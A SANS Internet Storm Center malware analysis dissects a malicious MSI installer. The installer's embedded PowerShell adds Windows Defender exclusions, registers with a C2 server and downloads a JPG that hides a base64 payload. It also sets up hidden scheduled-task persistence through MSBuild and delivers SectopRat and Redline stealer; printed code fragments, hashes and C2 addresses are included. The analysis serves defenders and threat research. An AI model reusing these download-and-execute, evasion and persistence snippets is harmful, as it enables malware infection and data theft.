One of my hunting rules hit on potentially malicious PowerShell code. The file was an MSI package (not an MSIX, these are well-known to execute malicious scripts[1]). This file was a good old OLE package:
remnux@remnux:/MalwareZoo/20240812$ trid resources.msi
TrID/32 – File Identifier v2.24 – (C) 2003-16 By M.Pontello
Definitions found: 14909
Analyzing…
Collecting data from file: resources.msi
80.0% (.MSI) Microsoft Windows Installer (454500/1/170)
10.7% (.MST) Windows SDK Setup Transform script (61000/1/5)
7.8% (.MSP) Windows Installer Patch (44509/10/5)
1.4% (.) Generic OLE2 / Multistream Compound (8000/1)
The file (SHA256: 69cad2bf6d63dfc93b632cfd91b5182f14b5140da22f9a0ce82c8b459ad76c38) has a low score on VT (1/32)[2]. I tried to install the package in my sandbox but it failed with an error message “This package can only be run from a bootstrapper”. After Googling more info, I found this:
If you get this error while attempting to uninstall or update a package with an EXE file, it may be because you’re using a multilingual package with a display language selection dialog (for multi-language packages) in the Languages Tab. This is a known issue that occurs when your different language installations have different Product Codes.
It could be related to the language used:
Let’s inspect the file with the msiinfo tool:
remnux@remnux:/MalwareZoo/20240812$ msiinfo suminfo resources.msi
Title: Installation Database
Subject: CYANBRAIN
Author: Cyan Brain
Keywords: Installer, MSI, Database
Comments:
Template: ;1033
Last author:
Revision number (UUID): {2B08376D-79DC-48D6-982C-C17D5DF6E62F}
Last printed: Fri Dec 11 06:47:44 2009
Created: Mon Aug 5 18:32:27 2024
Last saved: Fri Sep 18 10:06:51 2020
Version: 200 (c8)
Source: 2 (2)
Application: CYANBRAIN
Security: 0 (0)
Don’t pay attention to the timestamps, the file has probably been altered. Does it try to mimic the game with the same name[3]?
Legacy MSI files can also trigger the execution of code using the “Custom Action” table[4].
remnux@remnux:/MalwareZoo/20240812$ msiinfo export resources.msi CustomAction
Action Type Source Target ExtendedType
s72 i2 S72 S0 I4
CustomAction Action
AI_DetectSoftware 257 SoftwareDetector.dll OnDetectSoftware
AI_DETECT_MODERNWIN 1 aicustact.dll DetectModernWindows
AI_SET_ADMIN 51 AI_ADMIN 1
AI_AuthorSinglePackage 1 aicustact.dll AI_AuthorSinglePackage
AI_InstallModeCheck 1 aicustact.dll UpdateInstallMode
AI_SHOW_LOG 65 aicustact.dll LaunchLogFile
AI_DpiContentScale 1 aicustact.dll DpiContentScale
AI_EnableDebugLog 321 aicustact.dll EnableDebugLog
AI_BACKUP_AI_SETUPEXEPATH 51 AI_SETUPEXEPATH_ORIGINAL [AI_SETUPEXEPATH]
AI_DATA_SETTER_1 51 CustomActionData ParamsScript$date = “July”
$SS = Get-Random -Minimum 1500 -Maximum 3000
sleep -Milliseconds $SS
[[]Net.ServicePointManager[]]::SecurityProtocol = [[]Net.SecurityProtocolType[]]::Tls12
Add-MpPrefer`ence -ExclusionExtension “exe”, “.dll”, “.cmd”, “jpg”
Add-MpPrefer`ence -ExclusionPath “$env:USERPROFILE.steam”, “C:WindowsSystem32Config”, “$env:APPDATA”
Add-MpPrefer`ence -ExclusionProcess “powershell.exe”
… (Stuff Deleted) …
$code = [[]System.Text.Encoding[]]::UTF8.GetString($codeBytes)
Invoke-Expression $code
… (Stuff Deleted) …
This piece of PowerShell will perform some interesting actions:
First, it starts the registration process with the C2:
GET /?status=reg&key=bart_23rfs&site=Barto_ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251
Host: filemanaager[.]net
Connection: Keep-Alive
A footprint of the victim’s computer is sent:
GET /?status=start&av=Windows%20Defender&domain=WORKGROUP&os=Microsoft+Windows+10+Enterprise HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251
Host: filemanaager[.]net
The second stage is downloaded:
GET /bart.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.251
Host: 193[.]3[.]19[.]108
Connection: Keep-Alive
The file is a valid JPG image:
remnux@remnux:/mnt/hgfs/MalwareZoo/20240812$ file bart.jpg
bart.jpg: JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=15, bps=194, PhotometricIntepretation=RGB, description=Vibrant liquid wavy surface. 3D illustration abstract iridescent fluid render. Neon holographic, orientation=lower-left], progressive, precision 8, 7680×4320, components 3
But it contains a nice “gift”. The first PowerShell script will extract another payload located at the bottom of the file:
$goo = “abcdefghijklmnopqrstuvwxyz”
$xxx = -join (1..8 | ForEach-Object [{] Get-Random -InputObject $goo.ToCharArray() [}])
$url = “hxxp://193[.]3[.]19[.]108/bart.jpg” #^?^?^? ^?^?^?
$outputPath = “C:ProgramDatasteam.jpg”
Invoke-WebRequest -Uri $url -OutFile $outputPath
New-Item -ItemType Directory -Path $env:USERPROFILEz$xxx
$filePath = Join-Path $env:USERPROFILE “z$xxx$xxx.csproj”
$command = ‘$file = ”C:ProgramDatasteam.jpg”; ‘ +
‘$imageBytes = [[]System.IO.File[]]::ReadAllBytes($file); ‘ +
‘$blockSize = 1049526; ‘ +
‘$startIndex = $imageBytes.Length – $blockSize; ‘ +
‘$codeBytes = $imageBytes[[]$startIndex..($startIndex + $blockSize – 1)[]]; ‘ +
‘$code = [[]System.Text.Encoding[]]::UTF8.GetString($codeBytes); ‘ +
‘Invoke-Expression $code;’
Here is the extracted $code:
$base64 = “TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAA … (Stuff Deleted) … AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=^
$bytes = [Convert]::FromBase64String($base64)
$domain = [System.AppDomain]::CurrentDomain
$assembly = $domain.Load($bytes)
$method = $assembly.EntryPoint
$parameters = @()
$result = $method.Invoke($null, $parameters)
[System.GC]::Collect()
Let’s decode the payload:
remnux@remnux:/MalwareZoo/20240812$ base64dump.py -n 10 bart.jpg -s 7 -d >payload.exe
This malware belongs to the SectopRat family[5] (SHA256:7808f3aea222cdbec2e53b126f46195f4523e9501882b94e0cd42e30f8484f32). It connects to the following C2 server (located in Russia):
hxxp://213[.]109[.]202[.]229:9000/wbinjget?q=6DDE74FFD397B5FB346F9CA050F6095C
Persistence is implemented with a scheduled task that will extract again the payload from the “steam.jpg” JPEG image:
$xmlContent = @”
<Project xmlns=”http://schemas.microsoft.com/developer/msbuild/2003″>
<Target Name=”$xxx”>
<Exec Command=”powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand $EncodedText” />
</Target>
</Project>
“@
Set-Content -Path $filePath -Value $xmlContent
$action = New-ScheduledTaskAction -Execute “cmd.exe” -Argument “/c start /min powershell.exe -NoProfile -WindowStyle Hidden -Command `”Start-Process -FilePath ‘C:WindowsMicrosoft.NETFrameworkv4.0.30319Msbuild.exe’ -ArgumentList ‘$env:USERPROFILEz$xxx$xxx.csproj’, ‘/t:$xxx’ -WindowStyle Hidden`””
$trigger = New-ScheduledTaskTrigger -AtLogon
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopOnIdleEnd
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive
$task = New-ScheduledTask -Action $action -Trigger $trigger -Settings $settings -Principal $principal
Register-ScheduledTask -TaskName “Chrome-Reporting Task-$xxx” -TaskPath “” -InputObject $task
Start-ScheduledTask -TaskName “Chrome-Reporting Task-$xxx”
Then, another picture is downloaded from hxxp://193[.]3[.]19[.]108/Meta.jpg. I liked this one:
The file will carry another piece of malware that will be decoded using the same technique:
remnux@remnux:/MalwareZoo/20240812$ base64dump.py -n 10 Meta.jpg -s 12 -d >payload2.exe
This time, we are facing a Redline stealer[6] (SHA256:38c233b38ef1838666ce7204f41349d0ba9431ea4b23fdb05f915cc7a09ff7be). This one connects to:
83[.]97[.]73[.]190:4819
In conclusion, don’t trust MSI packages. Like any applications, download them only from safe locations!
[1] https://isc.sans.edu/diary/MSIX+With+Heavily+Obfuscated+PowerShell+Script/30636
[2] https://www.virustotal.com/gui/file/69cad2bf6d63dfc93b632cfd91b5182f14b5140da22f9a0ce82c8b459ad76c38
[3] https://f95zone.to/threads/cyan-brain-demo-8-1-nekouji-studio.210467/
[4] https://learn.microsoft.com/en-us/windows/win32/msi/customaction-table
[5] https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat
[6] https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.